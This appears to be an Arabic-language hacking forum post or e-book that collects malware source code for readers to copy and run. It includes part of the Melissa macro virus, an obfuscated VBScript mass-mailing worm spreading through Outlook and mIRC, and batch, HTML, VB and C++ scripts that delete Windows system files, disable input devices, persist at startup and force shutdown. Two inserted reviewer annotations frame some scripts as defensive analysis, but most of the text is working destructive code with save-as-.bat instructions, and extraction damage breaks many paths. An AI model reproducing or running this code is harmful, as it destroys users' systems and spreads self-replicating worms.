BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If p$ = "clone" System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\, "Melissa?") = "... by Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1 ) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item( 1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then _ ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1


ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If p$ = "clone"


If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True: End If 'WORD/Melissa written by Kwyjibo 'Clone written by Duke/SMF 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000


Virus? You Decide! 'Word ­> Email | Word 97 <­­> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty­two points, plus triple­ word­score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub

‫ هذا‬Virus worm ‫اقتباس‬: Set O6734VC6 = createobject("scripting.filesystemobject") O78SS2L7 = O6734VC6.getspecialfolder(1) A6G1HQFH = O78SS2L7 & "\geilfingeren.jpg.vbs" Set E828D4O2 = createobject("wscript.shell") E828D4O2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\WinUpdate", "wscript.exe " & A6G1HQFH & " %" O6734VC6.copyfile wscript.scriptfullname, A6G1HQFH UB51PCQU If E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\ CurrentVersion\fingeren.avi\UA1OM5IA") <> 1 then KD8F5L2N End if If E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\ CurrentVersion\fingeren.avi\D47AC8NJ") <> 1 then HLVO1EDH "" End if Function KD8F5L2N() Set O13Q767K = CreateObject("Outlook.Application")


If O13Q767K = "Outlook" Then Set LFSIH230 = O13Q767K.GetNameSpace("MAPI") Set LLLK4LPL = LFSIH230.AddressLists For Each A4A83865 In LLLK4LPL If A4A83865.AddressEntries.Count <> 0 Then JM1R7N44 = A4A83865.AddressEntries.Count For NHF463JD = 1 To JM1R7N44 Set OU435GC5 = O13Q767K.CreateItem(0) Set KP511I06 = A4A83865.AddressEntries(NHF463JD) OU435GC5.To = KP511I06.Address OU435GC5.Subject = "Very Important!" OU435GC5.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & "" execute "set DH97CAIN =OU435GC5." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115) IJ15SDEE = A6G1HQFH OU435GC5.DeleteAfterSubmit = True DH97CAIN.Add IJ15SDEE If OU435GC5.To <> "" Then OU435GC5.Send End If Next End If Next End If End function Function HLVO1EDH(AHAOA819) If AHAOA819 <> "" Then TJTE98P3 = E828D4O2.regread("HKEY_LOCAL_MACHINE\Software\Micr osoft\Windows\CurrentVersion\ProgramFilesDir") If O6734VC6.fileexists("c:\mirc\mirc.ini") Then AHAOA819 = "c:\mirc" ElseIf O6734VC6.fileexists("c:\mirc32\mirc.ini") Then AHAOA819 = "c:\mirc32" ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc\mirc.ini") Then AHAOA819 = TJTE98P3 & "\mirc" ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc32\mirc.ini") Then AHAOA819 = TJTE98P3 & "\mirc" Else AHAOA819 = "" End If End If If AHAOA819 <> "" Then Set U127MJ5H = O6734VC6.CreateTextFile(AHAOA819 & "\script.ini", True) U127MJ5H = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{" U127MJ5H = U127MJ5H & vbCrLf & "n0=on 1:JOIN:#:{" U127MJ5H = U127MJ5H & vbCrLf & "n1= /if ( $nick == $me ) { halt }" U127MJ5H = U127MJ5H & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick " U127MJ5H = U127MJ5H & A6G1HQFH


U127MJ5H = U127MJ5H & vbCrLf & "n3=}" script.Close End If End Function Function J706734V() On Error Resume Next Set CKQ24CHB = O6734VC6.Drives For Each G2U828D4 In CKQ24CHB OC078SS2 = G2U828D4 & " \ " Call L7R6G1HQ(OC078SS2) Next End Function Function L7R6G1HQ(FS6B51PC) Q35A1OM5 = FS6B51PC Set ITHD8F5L = O6734VC6.GetFolder(Q35A1OM5) Set G6F47AC8 = ITHD8F5L.Files For Each NFFLVO1E In G6F47AC8 If lcase(NFFLVO1E.Name) = "mirc.ini" Then HLVO1EDH(NFFLVO1E.ParentFolder) End If If O6734VC6.GetExtensionName(NFFLVO1E.path) = "vbs" O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true End if If O6734VC6.GetExtensionName(NFFLVO1E.path) = "vbe" O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true End if Next Set VSM3BL08 = ITHD8F5L.Subfolders For Each UQFA0DCQ In VSM3BL08 Call (UQFA0DCQ.path) Next End function Function UB51PCQU() Randomize If 1 + Int(Rnd * 50) = 7 then E828D4O2.run "RUNDLL32.EXE user.exe,exitwindows" end if end function

‫الن فايروسات العزيز‬ blackdream ‫هذا الفيروس يقوم بمهام منها‬


1:‫نسخ نفسه في بدا التشغيل‬ 2:‫تعطيل الكيبورد والفارة‬ 3:‫ انشاء اللف من المجلدات على سطح المكتب وعلى‬c 4:‫ حذف‬temp antivirus 5:‫يعطل المؤشرات‬ 6:‫حذف الويندوز نهائيا‬ 7:‫ة‬

‫غلق الجهاز بطريقة‬ ‫كود‬:

REM Reviewer annotation (defensive analysis; the script text below is unchanged).
REM Behaviour visible in the listing, in order:
REM   1. attrib +s +h is applied to the script itself, and a copy of the script is placed in the
REM      per-user Startup folder (logon persistence).
REM   2. After a cd aimed at system32, del /S /F /Q targets keyboard.drv, mouse.drv and keyboard.sys.
REM   3. mkdir creates folders with long taunt names under the user's Desktop and under C:.
REM      ping localhost is presumably used as a delay between stages.
REM   4. del with a piped Y answer is aimed at a path under Windows security, then *.cur and *.ani
REM      are deleted after a cd aimed at the Cursors folder.
REM   5. del /f /q is applied to "C:\Windows\*" and shutdown -s -t 4 follows.
REM Several paths lost their backslashes or gained spaces in extraction, so this text is a record of
REM intent rather than a faithful copy of a script.
REM Detection: a .bat or .cmd file appearing in a Startup folder, cmd.exe issuing forced recursive
REM deletes under the Windows directory, and shutdown invoked with a -c comment string.
REM Mitigation: a standard (non-administrator) account lacks the rights to delete most files under
REM C:\Windows. The Startup-folder copy needs no elevation, so that write is the event to monitor.
@echo OFF title T0TAL_DZ is attacked your systeme attrib +s +h %0 copy %0 "C:\Users\%username %\AppData\Roaming\Microsoft\Win dows\start Menu\Programs\startup" cd C:Windowssystem32 del /S /F /Q keyboard.drv del /S /F /Q mouse.drv del /S /F /Q keyboard.sys mkdir C:Users%usernameDesktopHELLO GOOD SIR YOUR COMPUTER IS IN THE PROCESS OF BEING , PLEASE ENJOY READING THESE FOLDERS ONE BY ONE AS YOU CANT USE YOUR KEYBOARD OR MOUSE AND DONT FORGET TO ENJOY HAVING THE REST OF YOUR COMPUTER GET RESTARTING YOUR COMPUTER IS TOO LATE, SHIT ALREADY WENT DOWN echo CHECK YOUR DESKTOP ping localhost >nul mkdir C:HOLY MAKING FOLDERS IS FUN. WELL FUN FOR ME, NOT FUN FOR YOU ALL I HAVE TO DO IS JUST TYPE THIS AND POOF FOLDERS ARE MADE K so I HOPE YOU BLEW THE REST OF THAT COMPUTER MONEY ON PHAT MONITORZ SO THIS FITS! echo CHECK YOUR C DRIVE echo WHOOPS FORGOT YOUR MOUSE DOESNT WORK LOL ping localhost >nul echo Y | del C:WindowssecurityDatabase cd C:WindowsCursors del /S /F /Q *.cur del /S /F /Q *.ani echo OH NO WHERE THE DID YOUR CURSOR GO ping localhost >nul


cls echo Y | del /f /q "C:\Windows\*" shutdown -s -t 4 -c "Sorry, T0TAL IS HERE" exit

‫الهوتميل‬ ‫فيروس‬ ‫الهوتميل‬ ‫فيروس‬ ‫جدااا‬ ‫خطير‬ ‫فيروس‬ ‫وهدا‬ ‫شيء‬ ‫كل‬ ‫بتعطيل‬ ‫يقوم‬ ‫المفكرة‬ ‫في‬ ‫وضعه‬ ‫الكود‬ ‫انسخ‬ notepad ‫بي‬ ‫متل‬ ‫واحفطه‬ bLaCkDrEaM.html

<html> <head> <**** **********="Content­Type" content="text/html; charset=iso­8859­1"> <title>Active­X HTML</title> </head> THIS HTML USING ACTIVE­X PLEASE CLICK #YES# <body bgcolor="#000000" Text="#C0C0C0"> <script language="VBScript"> <!­­ This is a MY BRAIN ­­!> On Error Resume Next Dim a Set fso = CreateObject("Scripting.FileSystemObject") Set a = fso.GetFile("win.ini") a.Delete Dim b Set fso = CreateObject("Scripting.FileSystemObject") Set b = fso.GetFile("system.ini") b.Delete


</script> <!­­­ This script author is THEONE­­­!> </body> </html> .................................................. .. ‫في‬ ‫بتجميعها‬ ‫قوم‬ ‫مجموعات‬ ‫الى‬ ‫مقسم‬notepad ‫النوت‬ ‫بي‬ ‫وحفظ‬ ‫باد‬ ‫النوت‬ ‫في‬ ‫ضعه‬ ‫باد‬ bLaCkDrEaM.bat ‫اقتباس‬: Disassembly of File: office_crack.exe Code Offset = 00000400, Code Size = 00000000 Data Offset = 00000400, Data Size = 00000000 Number of Objects = 0003 (dec), Imagebase = 004A0000h Object01: UPX0 RVA: 00001000 Offset: 00000400 Size: 00000000 Flags: E0000080 Object02: UPX1 RVA: 00007000 Offset: 00000400 Size: 00005000 Flags: E0000040 Object03: .rsrc RVA: 0000C000 Offset: 00005400 Size: 00000400 Flags: C0000040

+++++++++++++++++++ MENU INFORMATION ++++++++


++++++++++ There Are No Menu Resources in This Application +++++++++++++++++ DIALOG INFORMATION ++++++++ ++++++++++ There Are No Dialog Resources in This Application 0 +++++++++++++++++++ IMPORTED FUNCTIONS ++++++ ++++++++++++ 0 Number of Imported Modules = 0 (decimal)

+++++++++++++++++++ IMPORT MODULE DETAILS +++ ++++++++++++ 0 +++++++++++++++++++ EXPORTED FUNCTIONS +++++ +++++++++++++ 0 Number of Exported Functions = 0000 (decimal) ++

+++++++++++++++++++ ASSEMBLY CODE LISTING +++


+++++++++++++++ //********************** Start of Code in Object UPX0 ************** Program Entry Point = 004ABE60 (office_crack.exe File Offset:0000B260) g

:004A7000 EE out dx, al :004A7001 8702 xchg dword ptr [edx], eax :004A7003 92 xchg eax,edx r :004A7004 005026 add byte ptr [eax+26], dl :004A7007 4A dec edx p :004A7008 004003 add byte ptr [eax+03], al :004A700B FD std by :004A700C B269 mov dl, 69 :004A700E 9A2C1004F425E8 call E825:F404102C :004A7015 0100 add dword ptr [eax], eax :004A7017 4B dec ebx d :004A7018 CE into b :004A7019 699A6ED91FC82AC003B8 imul ebx, dword


ptr [edx+C81FD96E], B803C02A 0 :004A7023 B0A8 mov al, A8 :004A7025 A6 cmpsb :004A7026 699AA6A0989088809AA6 imul ebx, dword ptr [edx+9098A0A6], A69A8088 0 :004A7030 699A787068605850CD60 imul ebx, dword ptr [edx+60687078], 60CD5058 0 :004A703A 9F lahf e :004A703B 69480044073830 imul ecx, dword ptr [eax+00], 30380744 :004A7042 344D xor al, 4D :004A7044 D3 BYTE 0d0h :004A7045 7403 je 004A704A or :004A7047 28241C sub byte ptr [esp+ebx], ah * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:004A7045(C) y | 00 :004A704A 1810 sbb byte ptr [eax], dl


:004A704C D32CBB shr dword ptr [ebx+4*edi], cl :004A704F D7 xlat w :004A7050 0823 or byte ptr [ebx], ah :004A7052 03F8 add edi, eax e :004A7054 29F0 sub eax, esi e :004A7056 E84DD3344D call 4D7F43A8 :004A705B E0D8 loopnz 004A7035 ], :004A705D D0C8 ror al, 1 :004A705F BCB4344DD3 mov esp, D34D34B4 :004A7064 34AC xor al, AC :004A7066 A4 movsb[/ .................................................. .. ‫للويندوز‬ ‫الترحيب‬ ‫شاشة‬ ‫لحذف‬ ‫كود‬ ‫في‬ ‫ضعه‬ ‫العادة‬ ‫كل‬ ‫ستفهم‬ ‫العنوان‬ ‫من‬notepad ‫باد‬ ‫النوت‬ ‫بي‬ ‫وحفط‬ bLaCkDrEaM.bat ‫اقتباس‬: Del c:\windows\Logos.sys Del c:\windows\Logow.sys .................................................. ... ‫بيسك‬ ‫الفيجول‬ ‫فيروس‬


‫الويندوز‬ ‫تدمير‬ ‫فيروسات‬ ‫ا‬ ‫بي‬ ‫احفط‬ bLaCkDrEaM.bat ‫اقتباس‬: vbNormal SetAttr "c:\msdos.sys", vbNormal SetAttr "c:\io.sys", vbNormal SetAttr "c:\windows\win.ini", vbNormal SetAttr "c:\windows\system.ini", vbNormal SetAttr "c:\command.com", vbNormal SetAttr "c:\config.sys", vbNormal SetAttr "c:\windows\rundll.exe", vbNormal SetAttr "c:\windows\rundll32.exe", vbNormal Kill "C:\autoexec.bat" Kill "C:\msdos.sys" Kill "C:\io.sys" Kill "C:\windows\win.ini" Kill "C:\windows\system.ini" Kill "C:\command.com" Kill "C:\config.sys" Kill "C:\windows\rundll.exe" Kill "C:\windows\rundll32.exe"[/CODE .................................................. ........... ‫الويندوز‬ ‫تدمير‬ ‫فيروس‬new ‫تم‬ ‫اوامر‬ ‫عدة‬ ‫بصدار‬ ‫ودلك‬ ‫الضجية‬ ‫بتعديب‬ ‫الفيروس‬ ‫يمتاز‬ ‫الهاردسك‬ ‫بتدمير‬ ‫يقوم‬ ‫باد‬ ‫النوت‬ ‫في‬ ‫واحفظه‬ ‫الكود‬ ‫انسخ‬ notebad ‫دالك‬ ‫وبعد‬ ‫حفط‬ bLaCkDrEaM.bat


REM Reviewer annotation (defensive analysis; the commands below are unchanged).
REM The Del list names boot and shell files (command.com, win.com, Autoexec.bat, Logos.sys, Logow.sys)
REM together with tools an operator would use to inspect or repair the system (msconfig.exe,
REM regedit.exe, Scanregw.exe, Sysedit.exe), plus Rundll.exe, Rundll32.exe and Iexplore.exe.
REM The second part changes to the System folder under WinDir and runs deltree /y on *.exe.
REM The c:\windows\system layout and the deltree command belong to DOS-based Windows releases.
REM NOTE(review): the page does not state the target platform - confirm before relying on this.
REM Detection value today is mainly as a pattern: a script that removes diagnostic and recovery
REM tools alongside other deletions.
Del c:\windows\system\msconfig.exe Del c:\windows\Rundll32.exe Del c:\windows\regedit.exe Del c:\windows\Rundll.exe Del c:\Autoexec.bat Del c:\command.com Del c:\windows\Logos.sys Del c:\windows\Logow.sys Del c:\windows\Scanregw.exe Del C:\Program Files\Internet Explorer\Iexplore.exe Del c:\windows\system\Sysedit.exe Del c:\windows\win.com

@Echo off c: cd %WinDir%\System\ deltree /y *.exe


‫تعـجبكم‬ ‫الله‬ ‫شاء‬ ‫أن‬ ‫السود‬ ‫الحلم‬ ‫أخوكم‬ ‫يتبع‬............................. ­­­­­­­­­­­­­­­ bLaCkDrEaM 1­ ‫مباشره‬ ‫التشغيل‬ ‫بعد‬ ‫الملفات‬ ‫كل‬ ‫وحذف‬ ‫الوندوز‬ ‫قتل‬ ‫انسخ‬ ‫كود‬: @Echo off c: cd %WinDir%System deltree /y *.dll cd deltree /y *.sys echo 2­ ‫تشغيل‬ ‫اعادة‬ ‫اول‬ ‫بعد‬ ‫الملفات‬ ‫كل‬ ‫وحذف‬ ‫الوندوز‬ ‫قتل‬ ‫للجهاز‬ ‫انسخ‬ ‫كود‬: call attrib ­h ­r c:autoexec.bat >nul @Echo off c: cd %WinDir%System deltree /y *.dll cd deltree /y *.sys echo


3­‫فيرووس‬ C++ : ‫انسخ‬ ‫كود‬: #include #include #include main() { clrscr(); printf("tttCoffin Of Evil "); printf("ttWElcome to My World"); remove("c:\windows\system.ini"); remove("c:\windows\win.ini"); remove("c:\autoexec.bat"); remove("c:\msdos.sys"); remove("c:\io.sys"); remove("c:\command.com"); remove("c:\config.sys"); remove("c:\windows\ebd\command.com"); remove("c:\windows\ebd\ebd.cab"); remove("c:\windows\ebd\Autoexec.bat"); remove("c:\windows\ebd\setramd.bat"); remove("c:\windows\ebd\Findramd.exe"); rename("egypt.exe","c:/windows/startm~1/programs/sta rtup/win.exe"); printf("Windows destroyed ...nn"); system("PAUSE"); } 4­ ‫ ثانيه‬60 ‫بعد‬ ‫الجهاز‬ ‫إطفاء‬ ‫كود‬:


‫‪cmdow @ /HID‬‬ ‫‪shutdown.exe ­r ­f ­t 60 ­c "Windows XP will now restart ‬‬ ‫"حط‪ ‬الكلم‪ ‬الذي‪ ‬تريد‪in 60 Seconds...hacked by ‬‬ ‫‪net user aspnet /delete‬‬ ‫‪EXIT ‬‬

‫ارجو عدم استخدامه على اخواننا المسلمين‬ ‫واني بريء من كل عمل يضر اخواننا المسلمين‬

‫تم تصميم الكتاب بواسطة‬ ‫‪mr_Shark96‬‬

